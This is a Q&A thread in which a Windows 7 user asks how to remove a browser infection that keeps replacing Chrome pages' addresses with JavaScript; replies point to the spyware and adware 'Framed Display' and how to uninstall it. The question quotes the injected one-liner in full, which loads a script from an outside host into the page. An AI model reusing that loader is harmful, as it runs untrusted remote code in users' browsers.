# JavaScript injection script, how to remove?

Tags: windows-7, google-chrome, virus, javascript

today I started to notice a very strange behavior. At some intervals my web pages in Chrome browser changes its web address to some javascript code

```
javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apitrolatuntco-a.akamaihd.net/gsrs?is=smdvbg&bp=BAS&g=deb88396-8881-4cbf-aacd-e3a10fdbb2e6";a[0].appendChild(d);}}}catch(e){}
```

instead of its normal url `http://superuser.com/questions/ask` for example. I guess it is some kind of Javascript injection code but I don't know how to remove it ... ?

My operating system is Windows 7. 
Any ideas ?

Comment: What operating system? Have you run a malware / virus check?

Comment: [This answer](http://superuser.com/a/785167/194694) may be helpful.

Comment: That script link returns a Javascript file that references "trolatunt.co"

Which in turn is a spyware http://www.shouldiremoveit.com/trolatunt-119414-program.aspx.

Answer (score 1):

Go to “Control Panel” → “Programs” → “Programs and Features” (or “Control Panel” → “Programs and Features”, if your system is set up that way) and uninstall any program like “Framed Display”.

> Framed Display is an adware program, that displays pop-up ads and advertisements on web pages that you visit. These advertisements will be shown as boxes containing various coupons that are available, as underlined keywords, pop-up ads or advertising banners.
>
> Framed Display is advertised as a program that displays coupons for sites you are visiting and competitive prices when you are viewing product pages at sites like Amazon. Though this may sound like a useful service, the Framed Display program can be intrusive and will display ads whether you want them [to] or not.
>
> The Framed Display adware infection is designed specifically to make money. It generates web traffic, collects sales leads for other dubious sites, and will display advertisements and sponsored links within your web browser.

Source: [Remove Framed Display Ads (Virus Removal Guide)](http://malwaretips.com/blogs/framed-display-removal/)

Comment: While this may answer the question, it would be a better answer if you could provide some explanation for why it does so.

Comment: I don't have anything suspicious in my Control Panel programs list, but my Chrome surfing is randomly injected with Javascript.